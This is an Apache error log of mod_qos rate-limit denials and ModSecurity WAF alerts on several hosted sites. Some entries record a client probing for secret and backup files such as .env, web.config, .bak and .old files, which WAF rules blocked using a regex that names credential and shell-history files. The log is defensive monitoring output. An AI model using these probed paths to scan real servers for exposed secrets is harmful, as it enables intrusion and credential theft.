[Tue May 26 19:54:40.863857 2026] [qos:error] [pid 86490:tid 86699] [client 45.148.10.120:35072] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKFZMwN0DpLVWo6LDjwAAANQ
[Tue May 26 19:54:40.912300 2026] [qos:error] [pid 93576:tid 93761] [client 45.148.10.120:49374] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKGDRMqfxdEDkoszSbwAAADE
[Tue May 26 19:54:40.927984 2026] [qos:error] [pid 93576:tid 93724] [client 45.148.10.120:49396] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKGDRMqfxdEDkoszScAAAAAw
[Tue May 26 19:54:40.945741 2026] [qos:error] [pid 86490:tid 86713] [client 45.148.10.120:35238] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKFZMwN0DpLVWo6LDkAAAAOI
[Tue May 26 19:54:40.945991 2026] [qos:error] [pid 86490:tid 86741] [client 45.148.10.120:56922] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKFZMwN0DpLVWo6LDkQAAAP4
[Tue May 26 19:54:40.945999 2026] [qos:error] [pid 93576:tid 93765] [client 45.148.10.120:35246] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtKGDRMqfxdEDkoszScQAAADU
[Tue May 26 19:54:40.947532 2026] [security2:error] [pid 86490:tid 86703] [client 185.177.72.53:64328] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/var/www/html/ghost/.env"] [unique_id "ahWtKFZMwN0DpLVWo6LDkgAAANg"]
[Tue May 26 19:54:40.950606 2026] [qos:error] [pid 86490:tid 86671] [client 45.148.10.120:49406] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKFZMwN0DpLVWo6LDkwAAALg
[Tue May 26 19:54:40.976928 2026] [qos:error] [pid 86490:tid 86670] [client 45.148.10.120:49400] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKFZMwN0DpLVWo6LDlAAAALc
[Tue May 26 19:54:41.005316 2026] [qos:error] [pid 86490:tid 86726] [client 45.148.10.120:34958] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKVZMwN0DpLVWo6LDlQAAAO8
[Tue May 26 19:54:41.012240 2026] [qos:error] [pid 86490:tid 86709] [client 45.148.10.120:35072] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKVZMwN0DpLVWo6LDlgAAAN4
[Tue May 26 19:54:41.012902 2026] [qos:error] [pid 86490:tid 86674] [client 45.148.10.120:34866] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKVZMwN0DpLVWo6LDlwAAALs
[Tue May 26 19:54:41.067848 2026] [qos:error] [pid 93576:tid 93804] [client 45.148.10.120:49374] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKWDRMqfxdEDkoszScgAAAFw
[Tue May 26 19:54:41.075953 2026] [qos:error] [pid 93576:tid 93752] [client 45.148.10.120:49396] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKWDRMqfxdEDkoszScwAAACg
[Tue May 26 19:54:41.097923 2026] [qos:error] [pid 93576:tid 93719] [client 45.148.10.120:35246] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKWDRMqfxdEDkoszSdAAAAAc
[Tue May 26 19:54:41.098510 2026] [qos:error] [pid 86490:tid 86666] [client 45.148.10.120:56922] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKVZMwN0DpLVWo6LDmwAAALM
[Tue May 26 19:54:41.100323 2026] [qos:error] [pid 86490:tid 86724] [client 45.148.10.120:35238] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKVZMwN0DpLVWo6LDnAAAAO0
[Tue May 26 19:54:41.104891 2026] [qos:error] [pid 86490:tid 86628] [client 45.148.10.120:49406] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKVZMwN0DpLVWo6LDnQAAAI0
[Tue May 26 19:54:41.115328 2026] [security2:error] [pid 86490:tid 86702] [client 185.177.72.53:64328] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/oauth.php.old"] [unique_id "ahWtKVZMwN0DpLVWo6LDngAAANc"]
[Tue May 26 19:54:41.131476 2026] [qos:error] [pid 86490:tid 86745] [client 45.148.10.120:49400] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKVZMwN0DpLVWo6LDnwAAAQI
[Tue May 26 19:54:41.155400 2026] [qos:error] [pid 86490:tid 86738] [client 45.148.10.120:34958] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKVZMwN0DpLVWo6LDowAAAPs
[Tue May 26 19:54:41.160943 2026] [qos:error] [pid 86490:tid 86662] [client 45.148.10.120:35072] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKVZMwN0DpLVWo6LDpAAAAK8
[Tue May 26 19:54:41.275865 2026] [security2:error] [pid 93576:tid 93757] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJ2DRMqfxdEDkoszSOwAAAC0"]
[Tue May 26 19:54:41.276739 2026] [security2:error] [pid 86490:tid 86747] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJ1ZMwN0DpLVWo6LDGwAAAQQ"]
[Tue May 26 19:54:41.277331 2026] [security2:error] [pid 86490:tid 86638] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJ1ZMwN0DpLVWo6LDEwAAAJc"]
[Tue May 26 19:54:41.282891 2026] [security2:error] [pid 86490:tid 86703] [client 185.177.72.53:64328] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/media/web.config"] [unique_id "ahWtKVZMwN0DpLVWo6LDqwAAANg"]
[Tue May 26 19:54:41.286532 2026] [security2:error] [pid 86490:tid 86678] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJ1ZMwN0DpLVWo6LDGAAAAL8"]
[Tue May 26 19:54:41.289680 2026] [security2:error] [pid 93576:tid 93766] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJ2DRMqfxdEDkoszSNgAAADY"]
[Tue May 26 19:54:41.297005 2026] [security2:error] [pid 93868:tid 94305] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJ0qK9k_ZUB2Vp25KdQAAAb4"]
[Tue May 26 19:54:41.310604 2026] [qos:error] [pid 86490:tid 86677] [client 45.148.10.120:35072] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKVZMwN0DpLVWo6LDswAAAL4
[Tue May 26 19:54:41.312779 2026] [qos:error] [pid 93868:tid 94282] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtKUqK9k_ZUB2Vp25KqAAAAac
[Tue May 26 19:54:41.313538 2026] [qos:error] [pid 93868:tid 94357] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtKUqK9k_ZUB2Vp25KqQAAAfI
[Tue May 26 19:54:41.331141 2026] [security2:error] [pid 86490:tid 86735] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKFZMwN0DpLVWo6LDVwAAAPg"]
[Tue May 26 19:54:41.331834 2026] [security2:error] [pid 93868:tid 94319] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJ0qK9k_ZUB2Vp25KewAAAcw"]
[Tue May 26 19:54:41.337882 2026] [security2:error] [pid 86490:tid 86696] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJ1ZMwN0DpLVWo6LDEQAAANE"]
[Tue May 26 19:54:41.341444 2026] [security2:error] [pid 93868:tid 94370] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJ0qK9k_ZUB2Vp25KfwAAAf8"]
[Tue May 26 19:54:41.342604 2026] [security2:error] [pid 86490:tid 86721] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJ1ZMwN0DpLVWo6LDIgAAAOo"]
[Tue May 26 19:54:41.348462 2026] [security2:error] [pid 86490:tid 86668] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKFZMwN0DpLVWo6LDVQAAALU"]
[Tue May 26 19:54:41.348482 2026] [security2:error] [pid 86490:tid 86680] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJ1ZMwN0DpLVWo6LDKQAAAME"]
[Tue May 26 19:54:41.352176 2026] [security2:error] [pid 93576:tid 93740] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKGDRMqfxdEDkoszSUAAAABw"]
[Tue May 26 19:54:41.363977 2026] [security2:error] [pid 86490:tid 86716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJ1ZMwN0DpLVWo6LDHAAAAOU"]
[Tue May 26 19:54:41.364372 2026] [security2:error] [pid 86490:tid 86645] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJ1ZMwN0DpLVWo6LDMAAAAJ4"]
[Tue May 26 19:54:41.365514 2026] [security2:error] [pid 86490:tid 86732] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJ1ZMwN0DpLVWo6LDOgAAAPU"]
[Tue May 26 19:54:41.366014 2026] [security2:error] [pid 86490:tid 86661] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJ1ZMwN0DpLVWo6LDNwAAAK4"]
[Tue May 26 19:54:41.375967 2026] [security2:error] [pid 93576:tid 93750] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKGDRMqfxdEDkoszSTQAAACY"]
[Tue May 26 19:54:41.380824 2026] [security2:error] [pid 86490:tid 86637] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJ1ZMwN0DpLVWo6LDIQAAAJY"]
[Tue May 26 19:54:41.381283 2026] [security2:error] [pid 86490:tid 86723] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJ1ZMwN0DpLVWo6LDNAAAAOw"]
[Tue May 26 19:54:41.394082 2026] [security2:error] [pid 86490:tid 86700] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKFZMwN0DpLVWo6LDWAAAANU"]
[Tue May 26 19:54:41.400546 2026] [security2:error] [pid 86490:tid 86667] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKFZMwN0DpLVWo6LDVgAAALQ"]
[Tue May 26 19:54:41.406611 2026] [security2:error] [pid 93868:tid 94289] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKEqK9k_ZUB2Vp25KkAAAAa4"]
[Tue May 26 19:54:41.414238 2026] [security2:error] [pid 86490:tid 86626] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJ1ZMwN0DpLVWo6LDMQAAAIs"]
[Tue May 26 19:54:41.421747 2026] [security2:error] [pid 93576:tid 93729] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKGDRMqfxdEDkoszSTgAAABE"]
[Tue May 26 19:54:41.429869 2026] [security2:error] [pid 86490:tid 86684] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJ1ZMwN0DpLVWo6LDNQAAAMU"]
[Tue May 26 19:54:41.430858 2026] [security2:error] [pid 93868:tid 94356] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKEqK9k_ZUB2Vp25KlQAAAfE"]
[Tue May 26 19:54:41.435371 2026] [security2:error] [pid 93868:tid 94316] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKEqK9k_ZUB2Vp25KlwAAAck"]
[Tue May 26 19:54:41.445010 2026] [security2:error] [pid 93576:tid 93720] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKGDRMqfxdEDkoszSTwAAAAg"]
[Tue May 26 19:54:41.449481 2026] [security2:error] [pid 86490:tid 86629] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKFZMwN0DpLVWo6LDawAAAI4"]
[Tue May 26 19:54:41.616056 2026] [security2:error] [pid 86490:tid 86717] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtKVZMwN0DpLVWo6LDpwAAAOY"]
[Tue May 26 19:54:41.623185 2026] [security2:error] [pid 86490:tid 86728] [client 185.177.72.53:64328] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/docker-compose.yaml.bak"] [unique_id "ahWtKVZMwN0DpLVWo6LDyQAAAPE"]
[Tue May 26 19:54:41.755198 2026] [qos:error] [pid 86490:tid 86638] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtKVZMwN0DpLVWo6LD6wAAAJc
[Tue May 26 19:54:41.756566 2026] [qos:error] [pid 93576:tid 93743] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtKWDRMqfxdEDkoszSjgAAAB8
[Tue May 26 19:54:41.800221 2026] [qos:error] [pid 93576:tid 93744] [client 45.148.10.120:35254] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKWDRMqfxdEDkoszSjwAAACA
[Tue May 26 19:54:41.801111 2026] [qos:error] [pid 86490:tid 86633] [client 45.148.10.120:35158] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKVZMwN0DpLVWo6LD7wAAAJI
[Tue May 26 19:54:41.803237 2026] [qos:error] [pid 86490:tid 86681] [client 45.148.10.120:34806] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKVZMwN0DpLVWo6LD8AAAAMI
[Tue May 26 19:54:41.803472 2026] [qos:error] [pid 93576:tid 93789] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKWDRMqfxdEDkoszSkAAAAE0
[Tue May 26 19:54:41.804679 2026] [qos:error] [pid 86490:tid 86684] [client 45.148.10.120:34924] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKVZMwN0DpLVWo6LD8QAAAMU
[Tue May 26 19:54:41.805269 2026] [qos:error] [pid 93576:tid 93823] [client 45.148.10.120:35308] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKWDRMqfxdEDkoszSkQAAAG8
[Tue May 26 19:54:41.805426 2026] [qos:error] [pid 93868:tid 94353] [client 45.148.10.120:49384] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKUqK9k_ZUB2Vp25KuwAAAe4
[Tue May 26 19:54:41.807001 2026] [qos:error] [pid 93868:tid 94324] [client 45.148.10.120:56914] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKUqK9k_ZUB2Vp25KvAAAAdE
[Tue May 26 19:54:41.910759 2026] [qos:error] [pid 86490:tid 86703] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKVZMwN0DpLVWo6LD8gAAANg
[Tue May 26 19:54:41.911614 2026] [qos:error] [pid 86490:tid 86678] [client 45.148.10.120:35000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKVZMwN0DpLVWo6LD8wAAAL8
[Tue May 26 19:54:41.951791 2026] [qos:error] [pid 93576:tid 93771] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKWDRMqfxdEDkoszSlAAAADs
[Tue May 26 19:54:41.951883 2026] [qos:error] [pid 86490:tid 86677] [client 45.148.10.120:35158] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKVZMwN0DpLVWo6LD9AAAAL4
[Tue May 26 19:54:41.952382 2026] [qos:error] [pid 93576:tid 93733] [client 45.148.10.120:35254] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKWDRMqfxdEDkoszSkwAAABU
[Tue May 26 19:54:41.952921 2026] [qos:error] [pid 86490:tid 86643] [client 45.148.10.120:34806] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKVZMwN0DpLVWo6LD9QAAAJw
[Tue May 26 19:54:41.957113 2026] [qos:error] [pid 93868:tid 94375] [client 45.148.10.120:49384] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKUqK9k_ZUB2Vp25KvQAAAgQ
[Tue May 26 19:54:41.958033 2026] [qos:error] [pid 93576:tid 93748] [client 45.148.10.120:35308] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKWDRMqfxdEDkoszSlQAAACQ
[Tue May 26 19:54:41.958799 2026] [qos:error] [pid 86490:tid 86740] [client 45.148.10.120:34924] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKVZMwN0DpLVWo6LD9wAAAP0
[Tue May 26 19:54:41.959400 2026] [qos:error] [pid 93868:tid 94348] [client 45.148.10.120:56914] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKUqK9k_ZUB2Vp25KvgAAAek
[Tue May 26 19:54:42.063504 2026] [qos:error] [pid 86490:tid 86698] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKlZMwN0DpLVWo6LD_AAAANM
[Tue May 26 19:54:42.066422 2026] [qos:error] [pid 86490:tid 86717] [client 45.148.10.120:35000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKlZMwN0DpLVWo6LD_QAAAOY
[Tue May 26 19:54:42.221483 2026] [qos:error] [pid 93576:tid 93813] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKmDRMqfxdEDkoszSmAAAAGU
[Tue May 26 19:54:42.224008 2026] [qos:error] [pid 86490:tid 86638] [client 45.148.10.120:35158] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKlZMwN0DpLVWo6LEAgAAAJc
[Tue May 26 19:54:42.224222 2026] [qos:error] [pid 93576:tid 93725] [client 45.148.10.120:35254] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKmDRMqfxdEDkoszSmQAAAA0
[Tue May 26 19:54:42.278717 2026] [security2:error] [pid 86490:tid 86736] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKFZMwN0DpLVWo6LDZQAAAPk"]
[Tue May 26 19:54:42.279923 2026] [security2:error] [pid 86490:tid 86675] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKFZMwN0DpLVWo6LDaQAAALw"]
[Tue May 26 19:54:42.280550 2026] [security2:error] [pid 93576:tid 93758] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKGDRMqfxdEDkoszSVQAAAC4"]
